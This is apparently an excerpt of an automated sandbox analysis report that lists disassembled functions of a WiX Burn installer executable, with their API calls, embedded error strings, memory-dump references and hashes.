                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 446873843-2063007608
                                                                                                                                                                                                                                                                            • Opcode ID: e60a482bb0c9f03c8254e6dd2ed642a58f354d34bf52fc7deca2b17c46e295cf
                                                                                                                                                                                                                                                                            • Instruction ID: 6815d493d39e7f16f751b14a52b8289e944bb4d6d13e9f8bd9e889e2b29c028c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e60a482bb0c9f03c8254e6dd2ed642a58f354d34bf52fc7deca2b17c46e295cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4831F931D54229B7EB11AAB98C0AFAFBE78FF05751F100171BE10F6191E6704A40D7E1
                                                                                                                                                                                                                                                                            Function 008E73C3 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 008E74C2
                                                                                                                                                                                                                                                                              • Part of subcall function 008E4456: SetLastError.KERNEL32(00000000,?,?,?), ref: 008E446B
                                                                                                                                                                                                                                                                              • Part of subcall function 008E4456: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 008E447A
                                                                                                                                                                                                                                                                              • Part of subcall function 008E4456: GetLastError.KERNEL32(?,?,?), ref: 008E4484
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7416, 008E74AD
                                                                                                                                                                                                                                                                            • Failed to open run once log., xrefs: 008E7404
                                                                                                                                                                                                                                                                            • Failed to get current process path., xrefs: 008E7462
                                                                                                                                                                                                                                                                            • Unable to get resume command line from the registry, xrefs: 008E743E
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E74C2
                                                                                                                                                                                                                                                                            • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 008E749B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CloseFileHandleModuleName
                                                                                                                                                                                                                                                                            • String ID: Failed to get current process path.$Failed to open run once log.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry$d:\a\wix4\wix4\src\burn\engine\engine.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 628991300-3452002823
                                                                                                                                                                                                                                                                            • Opcode ID: b0f0cbb099296dabff624262a9af86d210c46597869d6e7110b7e2cc735803b6
                                                                                                                                                                                                                                                                            • Instruction ID: eff9d7dd5adc4317ebee3ef4428b8a9a4e6bc56a8f222a66678abbbd2faaaebd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0f0cbb099296dabff624262a9af86d210c46597869d6e7110b7e2cc735803b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8310672E40659B7DF22DBE68C46EDEBB68FF01709F004125FA04F6180E670AA448B91
                                                                                                                                                                                                                                                                            Function 0093D25B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Error reading version registry value due to unexpected data type: %u$Failed to convert registry string to version.$Failed to copy QWORD version value.$Failed to read version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-2150151203
                                                                                                                                                                                                                                                                            • Opcode ID: 3d50a84220115ddb2646dd932e5c2e443350d27c6799adff6e17cc7612b91c1b
                                                                                                                                                                                                                                                                            • Instruction ID: ead0f519a4f2766ea243fc080451566f28b82843f02263098b91e777e217d114
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d50a84220115ddb2646dd932e5c2e443350d27c6799adff6e17cc7612b91c1b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D721F872A81354B7DF216A559C4FF9F7EBCEF96B18F004055FA14BA1C1E5B08D00DAA2
                                                                                                                                                                                                                                                                            Function 00924048 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 0092408F
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcessWindow
                                                                                                                                                                                                                                                                            • String ID: BA passed NULL hwndParent to Apply.$BA passed invalid hwndParent to Apply.$Failed to alloc BOOTSTRAPPER_ENGINE_ACTION$Failed to enqueue apply action.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 850432942-3904185537
                                                                                                                                                                                                                                                                            • Opcode ID: 9e5bc1954e14a4192d78648dd8a57b6e87fc3300f08d05bbf61465b88d5b31d4
                                                                                                                                                                                                                                                                            • Instruction ID: b2861475ced8418d7dd072762deeddb5f6857dda04d0e511d6b8b637e25565df
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e5bc1954e14a4192d78648dd8a57b6e87fc3300f08d05bbf61465b88d5b31d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E52126B1B80324BBE7219A55AC4FF6F255CDB62F58F110115B700BF1C2E6E69E508AE3
                                                                                                                                                                                                                                                                            Function 008FB286 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for message.$Failed to calculate total pipe message size$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-2608942841
                                                                                                                                                                                                                                                                            • Opcode ID: 10eb360022f30a9b103d884ee1689153e7f6c0ad205f975e1398031987ee8eef
                                                                                                                                                                                                                                                                            • Instruction ID: bd0e540691d1f684743ad15d48dffbf9ee93225a8f77fa806d3a1882b457c9ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10eb360022f30a9b103d884ee1689153e7f6c0ad205f975e1398031987ee8eef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F21B5B2500248BBDB11EA9ACC85FEFBBACEF96724F100115F604EB241D674990487A2
                                                                                                                                                                                                                                                                            Function 008FD4BF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,00000000,00000000), ref: 008FD523
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FD52D
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,00000000,00000000), ref: 008FD599
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 669721577-2625618253
                                                                                                                                                                                                                                                                            • Opcode ID: e18ad0bf191193898ec8c35e7820c94ba072eed6d74015d57edbcbae6e918058
                                                                                                                                                                                                                                                                            • Instruction ID: 478534ff8288faa391f9ff62bfabaf688655296cca5e176653958e64bb674dc8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e18ad0bf191193898ec8c35e7820c94ba072eed6d74015d57edbcbae6e918058
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC210D72E4031877E7219AA98C8AF6FB66DFF45B54F114115BB04FB1C1E2B09D008BA1
                                                                                                                                                                                                                                                                            Function 0094BB11 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094BB55
                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 0094BB94
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094BB9E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastTime$FileSystem
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp$failed to convert system time to file time$failed to get create time for internet file handle
                                                                                                                                                                                                                                                                            • API String ID: 1528435940-425296829
                                                                                                                                                                                                                                                                            • Opcode ID: 2b88b5212238dd7d9cc5d50a961950c2c9637430d2e03e5e86e827066a9cfe9b
                                                                                                                                                                                                                                                                            • Instruction ID: d4ffa461d20ed40d3334a050b7babe21ba860174613e5be983079540238a4343
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b88b5212238dd7d9cc5d50a961950c2c9637430d2e03e5e86e827066a9cfe9b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C213A73A40229B7E720DAA49C09FBFB6ACEF45B50F010125FE04FB180E674DC0086E1
                                                                                                                                                                                                                                                                            Function 0090E1D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1970631241-1065166858
                                                                                                                                                                                                                                                                            • Opcode ID: 7b54b05e93bc67f4a6fdf38d087bb5f69da4ad48da8307e40de98c3a13db1fb3
                                                                                                                                                                                                                                                                            • Instruction ID: 412e73189ef2e677147e79dd9205da37f3f000cf0eb3ec4a7b8929142eedb777
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b54b05e93bc67f4a6fdf38d087bb5f69da4ad48da8307e40de98c3a13db1fb3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63210076640201AFCB01DF5DCC89E9A7BACEF85B54F110454FA24EB2D6E2B0D900DB20
                                                                                                                                                                                                                                                                            Function 0093B523 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0093B4C2,?), ref: 0093B5EF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • EnableLUA, xrefs: 0093B599
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp, xrefs: 0093B582
                                                                                                                                                                                                                                                                            • Failed to read registry value to detect UAC., xrefs: 0093B5C7
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0093B539
                                                                                                                                                                                                                                                                            • Failed to open system policy key to detect UAC., xrefs: 0093B573
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: EnableLUA$Failed to open system policy key to detect UAC.$Failed to read registry value to detect UAC.$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1917839530
                                                                                                                                                                                                                                                                            • Opcode ID: 6c54c07ed16aef7732bd97d920ccd8a467c4993cefa886040c1483ea754114d7
                                                                                                                                                                                                                                                                            • Instruction ID: d25da540be52712a11f1d99e8de03119dc40bcf7e9b9db9e8d8d571008ef9e43
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c54c07ed16aef7732bd97d920ccd8a467c4993cefa886040c1483ea754114d7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66212B72F80726FBD7215AA88C8BFAAB66C9F40750F154535BB45BB190D3B48D409AC0
                                                                                                                                                                                                                                                                            Function 008E2B25 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0090D303,00000000,00000008,00000000,80070656), ref: 008E2B56
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001,00000000,80070656,00000000,?), ref: 008E2B63
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001), ref: 008E2BE7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate string for message.$Failed to format message for error: 0x%x$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1365068426-3351270200
                                                                                                                                                                                                                                                                            • Opcode ID: 0fbbe165cd1afc34f536f38d67b421d90d44749141faa7b9406c5953d055ab8b
                                                                                                                                                                                                                                                                            • Instruction ID: fea58b7b71e6ef2e8c0566bd1769f987e24b38dd58f574c37221236be13b7ef0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fbbe165cd1afc34f536f38d67b421d90d44749141faa7b9406c5953d055ab8b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E21C3B694126ABBDB219F95CC4AFAF7A6CFB45764F004161BE00F6180E2748E00D6E0
                                                                                                                                                                                                                                                                            Function 00940BEE Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(008E7D9B), ref: 00940C6C
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00940CB6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectNodes$pixnParent parameter was null in XmlSelectNodes$ppixnChild parameter was null in XmlSelectNodes
                                                                                                                                                                                                                                                                            • API String ID: 344208780-3683195698
                                                                                                                                                                                                                                                                            • Opcode ID: 28a692656c7b35163a8cda83adcaff0a39d54344aa6c84449a8195dfc1e7cffa
                                                                                                                                                                                                                                                                            • Instruction ID: 1872fe3a7ebcfe9e17aa4ee8f17c2450cd450ad1da658b428c506a16b10d01b4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28a692656c7b35163a8cda83adcaff0a39d54344aa6c84449a8195dfc1e7cffa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E1136B2780311B7E6311A184C8AF6F219CEFD6B16F11C629FB14BB2C1DAB08C0193A1
                                                                                                                                                                                                                                                                            Function 00940CC5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(008E7D9B), ref: 00940D43
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00940D8D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
